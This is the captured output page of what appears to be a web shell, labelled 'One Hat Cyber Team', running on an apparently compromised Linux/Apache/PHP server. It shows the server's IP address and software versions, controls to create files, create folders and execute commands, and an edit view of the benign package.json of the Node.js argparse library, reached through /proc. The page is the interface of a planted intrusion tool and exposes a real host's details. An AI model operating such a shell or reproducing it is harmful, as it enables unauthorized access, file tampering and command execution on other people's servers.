One Hat Cyber Team
Your IP :
10.30.1.1
Server IP :
103.148.201.5
Server :
Linux web-olt 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Server Software :
Apache/2.4.52 (Ubuntu)
PHP Version :
8.1.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
6955
/
root
/
usr
/
share
/
nodejs
/
argparse
/
Edit File:
package.json
{ "name": "argparse", "description": "CLI arguments parser. Native port of python's argparse.", "version": "2.0.1", "keywords": [ "cli", "parser", "argparse", "option", "args" ], "main": "argparse.js", "files": [ "argparse.js", "lib/" ], "license": "Python-2.0", "repository": "nodeca/argparse", "scripts": { "lint": "eslint .", "test": "npm run lint && nyc mocha", "coverage": "npm run test && nyc report --reporter html" }, "devDependencies": { "@babel/eslint-parser": "^7.11.0", "@babel/plugin-syntax-class-properties": "^7.10.4", "eslint": "^7.5.0", "mocha": "^8.0.1", "nyc": "^15.1.0" } }
Simpan